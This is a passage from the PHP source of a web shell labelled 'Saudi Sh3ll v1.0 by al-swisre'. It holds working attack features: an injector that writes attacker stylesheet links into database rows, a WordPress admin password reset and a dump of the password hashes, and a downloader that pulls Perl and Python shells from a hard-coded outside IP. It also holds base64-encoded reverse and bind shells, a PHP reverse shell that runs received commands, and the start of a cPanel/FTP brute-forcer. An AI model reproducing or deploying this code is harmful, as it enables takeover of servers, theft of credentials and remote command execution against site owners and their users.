1983 $title   = $r33o['title'];
1984 $message = $r33o['message'];
1985 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1986 
1987 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1988 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1989 echo "</table></div>";
1990 exit;
1991 
1992 
1993 
1994 }
1995 
1996 
1997 
1998 
1999 
2000 }
2001 else
2002 {
2003 
2004 echo'<form method="post">
2005  <br /><br />
2006 search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
2007 <option value="tr">ticket</option>
2008 <option value="trs">ticket replies</option>
2009 </select> <br /><br />
2010 <input type="submit" name="viw" value="search"  />
2011 
2012 </form>';
2013 exit;
2014 
2015 
2016 
2017 
2018 
2019 }
2020 }
2021 
2022 
2023 
2024 
2025 else if ($op == 'sh3')
2026 
2027 {
2028 
2029 if (isset($_POST['viw']))
2030 {
2031 
2032 $string = $_POST['string'];
2033 $ch = $_POST['ch'];
2034 
2035 if ($ch == 'trs')
2036 {
2037    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
2038 
2039 }
2040 
2041 else if($ch == 'tr')
2042   {
2043    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
2044   }
2045 
2046 
2047 
2048 
2049 $nu0 = @mysql_num_rows($sql4);
2050 if ($nu0 == 0){echo "No result"; exit;}
2051 
2052 while ($r33o = @mysql_fetch_assoc($sql4))
2053 {
2054 
2055 
2056 $date    = $r33o['date'];
2057 $title   = $r33o['title'];
2058 $message = $r33o['message'];
2059 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
2060 
2061 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
2062 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
2063 echo "</table></div>";
2064 
2065 
2066 
2067 
2068 }
2069 
2070 
2071 
2072 
2073 
2074 }
2075 else
2076 {
2077 
2078 echo'<form method="post">
2079  <br /><br />
2080 search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
2081 <option value="tr">ticket</option>
2082 <option value="trs">ticket replies</option>
2083 </select> <br /><br />
2084 <input type="submit" name="viw" value="search"  />
2085 
2086 </form>';
2087 
2088 exit;
2089 
2090 
2091 
2092 
2093 }
2094 }
2095 
2096 
2097 else if ($op == 'css')
2098 
2099 {
2100 
2101 if (isset($_POST['viw']))
2102 {
2103    $index = $_POST['index'];
2104    $seh = $_POST['string'];
2105    $rs = search($seh);
2106     if(count($rs) == 0){echo 'No result';exit;}
2107     foreach ($rs as $info)
2108     {
2109 
2110    $table = $info['table'];
2111    $column = $info['column'];
2112 
2113    echo "table :  $table<br /><br />
2114 
2115    column : $column
2116    <form method=\"post\">
2117  <br /><br />
2118 <input type='submit' name='v' value=\"inject\"  />
2119             <input type='hidden' name=\"index\" value=$index>
2120             <input type=\"hidden\" name=\"table\" value='$table'>
2121             <input type=\"hidden\" name=\"column\" value='$column' >
2122             <input type=\"hidden\" name=\"shearc\" value='$seh'>
2123 </form>
2124 ";
2125 
2126 exit;
2127 
2128 
2129 
2130 
2131 
2132 
2133 
2134     }
2135 
2136 
2137 
2138 
2139 
2140 
2141 
2142 }
2143 else
2144 {
2145 
2146 echo'<form method="post">
2147  <br /><br />
2148 search : <input type="text" name="string" />
2149 <br />
2150 Css url : <input type="text" name="index"><br /><br />
2151 <input type="submit" name="viw" value="search"  />
2152 
2153 </form>';
2154 exit;
2155 
2156 
2157 
2158 
2159 
2160 }
2161 
2162    if (isset($_POST['v']))
2163    {
2164 
2165    $seh = $_POST['shearc'] ;
2166    $table = $_POST['table'];
2167    $column = $_POST['column'] ;
2168    $rlcss = $_POST['index'] ;
2169 
2170      $data = "<head><link href=$rlcss rel=stylesheet></head>";
2171 
2172     $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
2173     if($query){
2174         echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
2175         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2176         exit;
2177     }else{
2178         echo '<center><br /><div style=\"color: #003300;  font-weight: bold\"> Injection erorr</div>';
2179 
2180 
2181         exit;
2182     }
2183 
2184 
2185    }
2186 
2187 
2188 }
2189 
2190 
2191 else if ($op == 'awp')
2192 
2193 {
2194 
2195 
2196 
2197 if (isset($_POST['viw']))
2198 {
2199 
2200 $pass = $_POST['pass'];
2201 $user = $_POST['user'];
2202 
2203 
2204 $crypt = crypt($pass);
2205 
2206 $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
2207 $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
2208 
2209 if ($query)
2210 {
2211   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
2212   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2213   exit;
2214 }
2215 else if (!$query)
2216 {
2217   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
2218   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2219   exit;
2220 
2221 }
2222 
2223 
2224 
2225 
2226 
2227 
2228 
2229 }
2230 else
2231 {
2232 
2233 echo'<form method="post">
2234  <br /><br />
2235 user : <input type="text" name="user" /><br /><br />
2236 pass : <input type="text" name="pass" /><br /><br />
2237 <input type="submit" name="viw" value="update"  />
2238 
2239 </form>';
2240 
2241 
2242 
2243 
2244 
2245 }
2246 }
2247 
2248 
2249 else if ($op == 'shwp')
2250 {
2251 
2252 
2253 
2254 
2255 
2256 $sql = 'select * from `wp_users`';
2257 $query =@ mysql_query($sql);
2258 
2259 if ($query)
2260 {
2261 
2262 while ($row = mysql_fetch_assoc($query))
2263 {
2264 
2265 echo "
2266 <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
2267 <tr>
2268        <td>ID :</td>
2269        <td>user :</td>
2270        <td>pass :</td>
2271        <td>email :</td>
2272 
2273 </tr>
2274 
2275 
2276 <tr>
2277        <td>".$row['ID']."</td>
2278        <td>".$row['user_login']."</td>
2279        <td>".$row['user_pass']."</td>
2280         <td>".$row['user_email']."</td>
2281 </tr>
2282 
2283 
2284 
2285 </table>
2286 
2287 
2288   ";
2289 
2290   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
2291   exit;
2292 
2293 
2294 
2295 
2296 
2297  }}
2298 
2299 }
2300 
2301 
2302 
2303 }
2304 
2305 break;
2306 
2307 
2308 
2309 /////////////////////////////////////////////// info   ///////////////////////////////////
2310 case 'info':
2311 
2312 $sws = 'al-swisre' ;
2313 if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2314 
2315 if(strlen($dir)>1 && $dir[1]==":")
2316 $os = "Windows";
2317 else $os = "Linux";
2318 $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
2319 $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
2320 $ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
2321 $ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
2322 $hostname = @findit($read,"Hostname:","<br>");
2323 $isp = @findit($r3ad,"ISP</td><td>","</td>");
2324 
2325 
2326 
2327 
2328 
2329 
2330 echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
2331 <tr><td colspan='2'>Information Server</td><tr>
2332 <tr><td>Hostname</td><td>".$hostname."</td></tr>
2333 <tr><td>ISP</td><td>".$isp."</td></tr>
2334 <tr><td>IP-Network</td><td>".$ipnet."</td></tr>
2335 <tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
2336 <tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
2337 <tr><td>System</td><td>".$os."</td></tr>
2338 <tr><td>PHP Version </td><td>".phpversion()."</td></tr>
2339 <tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
2340 <tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
2341 <tr><td>Curl </td><td>".Curl()."</td></tr>
2342 <tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
2343 <tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
2344 <tr><td>Gzip </td><td>".Gzip()."</td></tr>
2345 <tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
2346 <tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
2347 <tr><td>MySQL</td><td>".MySQL2()."</td></tr>
2348 <tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
2349 <tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
2350 <tr><td>Oracle</td><td>".Oracle()."</td></tr>";
2351 
2352 exit;
2353 
2354 
2355 
2356 
2357 
2358 
2359 
2360 
2361 
2362 
2363 
2364 
2365 
2366 
2367 
2368 
2369 
2370 
2371 
2372 break;
2373 
2374 
2375 ///////////////////////////////// bypass ///////////////////////
2376 
2377 case 'byp':
2378 
2379 
2380 echo '<div class="cont3">
2381 [ <a href="?sws=byp"> bypass </a>]
2382 
2383 [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
2384 
2385 [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
2386 [<a href="?sws=byp&op=g3t"> Get file </a>]
2387 
2388 </div><br /><br />'  ;
2389 
2390 $op = $_GET['op'];
2391 
2392 if(@$_GET['dir']){
2393     $dir = $_GET['dir'];
2394     if($dir != 'nullz') $dir = @cleandir($dir);
2395 }
2396 
2397 if ($op == 'shell')
2398 {
2399 
2400 
2401 $sh = $_GET['sh'];
2402 ////////////////////////// perl or python //////////////////////
2403 
2404 if (!isset($_POST['get']))
2405 {
2406 
2407 
2408 
2409 echo "<form method='post'>
2410 Path shell : <input type='text' name='path'  value='".$dir."/cgi-bin' size='30'/><br /><br />
2411 name shell : <input type='text' name='name'  value='shell.sa' size='25' /><br /><br />
2412 htaccess   :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
2413 <br /><br />
2414 <input type='submit' name='get' value='Make' /></form>";
2415 
2416 }else {
2417 
2418 
2419 $path = $_POST['path'];
2420 $name = $_POST['name'];
2421 $htac = $_POST['htx'];
2422 
2423 if (isset($htac))
2424 {
2425 
2426 $fop = @fopen("$path/.htaccess", 'w');
2427 
2428 @fwrite($fop,$htac);
2429 
2430 @fclose($fop);
2431 
2432 }
2433 
2434 $rpath = $path."/".$name;
2435 
2436 
2437 if ($sh == 'perl')
2438 {
2439     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/perl.zip';   /// perl
2440     $path = $dir."/".$d3r."/"."sa.pl";
2441 
2442 }
2443 else if($sh == 'py')
2444 
2445 {
2446 
2447     $url_shell  = 'http://64.15.137.117/~google/cgi-bin/python.zip';  /// python
2448     $path = $dir."/".$d3r."/"."sa.py";
2449 
2450 
2451 }
2452 
2453 //// get shell///
2454 
2455 
2456     $fp = @fopen($rpath, 'w');
2457 
2458     $ch = @curl_init($url_shell);
2459     @curl_setopt($ch, CURLOPT_FILE, $fp);
2460 
2461     $data = @curl_exec($ch);
2462 
2463     @curl_close($ch);
2464     @fclose($fp);
2465 
2466 
2467 
2468 if (!is_file($rpath))
2469 {
2470 
2471 
2472 
2473     $ch = @curl_init($url_shell);
2474     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2475 
2476     $data = @curl_exec($ch);
2477 
2478     @curl_close($ch);
2479 
2480     @file_put_contents($rpath, $data);
2481 
2482 }elseif (@is_file($rpath)) {
2483 
2484 $ch =@chmod($rpath,0755);
2485 
2486 echo "Sh3ll have been created<br /><br />
2487 $rpath";
2488 
2489 
2490 
2491 }else {echo "error";}
2492 
2493 }
2494 }
2495 ///////////////////// get file ////////////////////
2496 elseif ($op == 'g3t')
2497 {
2498 
2499 if (!isset($_POST['get']))
2500 {
2501 
2502 
2503 echo 'Get file<br /><br /><br />
2504 <form method="post">
2505 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
2506 Url file : <input type="text" name="file" />&nbsp;&nbsp;
2507 to : <input type="text" name="path" value="'.$dir.'/file.php"  /><br /><br />
2508 <input type="submit" name="get" value="Get" />
2509 
2510 </form>' ;exit;
2511 
2512 
2513 
2514 
2515 
2516 
2517 
2518 }
2519 else
2520 {
2521 
2522 $url_shell = $_POST['file'];
2523 $path = $_POST['path'];
2524 
2525 
2526 
2527     $fp = @fopen($path, 'w');
2528 
2529     $ch = @curl_init($url_shell);
2530     @curl_setopt($ch, CURLOPT_FILE, $fp);
2531 
2532     $data = @curl_exec($ch);
2533 
2534     @curl_close($ch);
2535     @fclose($fp);
2536 
2537 
2538 
2539 if (!is_file($path))
2540 {
2541 
2542 
2543 
2544     $ch = @curl_init($url_shell);
2545     @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2546 
2547     $data = @curl_exec($ch);
2548 
2549     @curl_close($ch);
2550 
2551     @file_put_contents($path, $data);
2552 
2553 }elseif (@is_file($path)) {
2554 
2555 
2556 echo "got the file successfully<br /><br />
2557 $path"; exit;
2558 
2559 
2560 
2561 }else {echo "error";}
2562 
2563 
2564 
2565 }
2566 
2567 
2568 
2569 
2570 
2571 }else if(!isset($op)) {}
2572 
2573 
2574 
2575 
2576 
2577 
2578 
2579 break;
2580 
2581 /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
2582 
2583 case 'con':
2584 
2585 
2586 
2587 if (!isset($_POST['con']))
2588 {
2589 echo "";
2590 
2591 echo "
2592 <div class='conn'><table cellpadding='0' align='center'>
2593 <br />
2594 <form method=\"post\">
2595 <tr><td>
2596 <br />Back Connect :<br /> <br />
2597 Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
2598 Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
2599 <select name=\"op\">
2600 <option value=\"php\">PHP</option>
2601 <option value=\"perl\">Perl</option>
2602 <option value=\"python\">Python</option>
2603 </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
2604 <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
2605 <option value=\"perl\">Perl</option>
2606 <option value=\"python\">Python</option>
2607 </select>
2608 <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
2609 
2610 
2611 </form>";
2612 
2613 exit;
2614 
2615 }else
2616 {
2617 
2618 if ($_POST['con'] == 'Connect') {
2619 
2620 
2621 
2622 $ip = $_POST['ip'] ;
2623 $port = $_POST['port'] ;
2624 $op = $_POST['op'] ;
2625 
2626 $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2627 $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
2628 
2629 $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2630 $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";
2631 
2632 ////////////////////////// php ///////////////////////
2633 if ($op == 'php')
2634 {
2635 
2636 $sockfd=fsockopen($ip , $port , $errno, $errstr );
2637 
2638  if($errno != 0)
2639         {
2640             echo "$errno : $errstr";
2641         }
2642         else if (!$sockfd)
2643         {
2644                $result = "error connect!</p>";
2645         }
2646         else
2647         {
2648             fputs ($sockfd ,
2649             "
2650 /
2651 ###
2652 ###
2653 ###
2654 ###
2655 ###
2656 ###
2657 ###
2658 ###
2659 ###
2660 ###
2661 ###
2662 ###
2663 ###
2664 ###
2665 ###
2666 ###\
2667 #                                #
2668 #      Saudi Sh3ll v1.0          #
2669 #                                #
2670 #        by al-swisre            #
2671 #                                #
2672 \
2673 ###
2674 ###
2675 ###
2676 ###
2677 ###
2678 ###
2679 ###
2680 ###
2681 ###
2682 ###
2683 ###
2684 ###
2685 ###
2686 ###
2687 ###
2688 ###/");
2689          $pwd = shell_exec("pwd");
2690          $sysinfo = shell_exec("uname -a");
2691          $id = shell_exec("id");
2692          $len = 1337;
2693          fputs($sockfd ,$sysinfo . "\n" );
2694          fputs($sockfd ,$pwd . "\n" );
2695          fputs($sockfd ,$id ."\n\n" );
2696          while(!feof($sockfd))
2697          {
2698             $cmdPrompt ="(Saudi sh3ll)[$]> ";
2699             fputs ($sockfd , $cmdPrompt );
2700             $command= fgets($sockfd, $len);
2701             fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
2702          }
2703          fclose($sockfd);
2704         }
2705 
2706 echo "End Connect";
2707 exit;
2708 }
2709 
2710 
2711 
2712 
2713 elseif ($op == 'perl')
2714 {
2715 
2716 
2717 op_sa("/tmp/sa.pl",$back_perl);
2718            $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
2719             sleep(1);
2720            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2721             unlink("/tmp/sa.pl");
2722 
2723 
2724 
2725 }
2726 
2727 
2728 
2729 elseif ($op == 'python')
2730 {
2731 
2732 
2733 op_sa("/tmp/sa.py",$back_py);
2734            $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
2735             sleep(1);
2736            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2737 
2738 
2739 
2740 
2741 }
2742 
2743 }
2744 else if ($_POST['con'] == 'Connect bind'){
2745 /////////////////////// bind /////////////////////
2746 
2747 if ($op == 'perl')
2748 {
2749 
2750 
2751 
2752 $bind_port = $_POST['bind_port'];
2753 
2754 op_sa("/tmp/sa.pl",$bind_perl);
2755            $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
2756             sleep(1);
2757            echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
2758             unlink("/tmp/sa.pl");
2759 
2760 
2761 
2762 }
2763 
2764 else if ($op == 'python')
2765 {
2766 
2767 
2768 $bind_port = $_POST['bind_port'];
2769 
2770 op_sa("/tmp/sa.py",$bind_py);
2771            $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
2772             sleep(1);
2773            echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
2774             unlink("/tmp/sa.py");
2775 
2776 
2777 
2778 
2779 
2780 
2781 }
2782 
2783 
2784 
2785 
2786 
2787 
2788 }}
2789 
2790 
2791 
2792 
2793 
2794 break;
2795 
2796 ////////////////////////////////////////// BruteForce  /////////////////////
2797 
2798 case 'brt':
2799 
2800 echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
2801 
2802 
2803 
2804 if (!isset($_POST['bru']))
2805 {
2806 
2807 echo '<form method="post">
2808 
2809 <textarea name="user" cols="30" rows="15">userlist</textarea>
2810 <textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
2811 target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
2812 <select name="op">
2813 <option value="cpanel">cpanel</option>
2814 <option value="ftp">ftp</option>
2815 </select><br /> <br />
2816 <input type="submit" name="bru" value="brute" />
2817 </form>';
2818 
2819 exit;
2820 }else
2821 {
2822 
2823 $users = $_POST['user'];
2824 $pass = $_POST['pass'];
2825 $option = $_POST['op'];
2826 $connect_timeout=5;
2827 @ini_set('memory_limit', 1000000000000);
2828 $target = $_POST['trg'];
2829 @set_time_limit(0);
2830 
2831 $userlist = explode ("\n" , $users );
2832 $passlist = explode ("\n" , $pass );
2833 
2834 foreach ($userlist as $user) {
2835 $_user = trim($user);
2836 foreach ($passlist as $password ) {
2837 $_pass = trim($password);
2838 if($option == "ftp"){
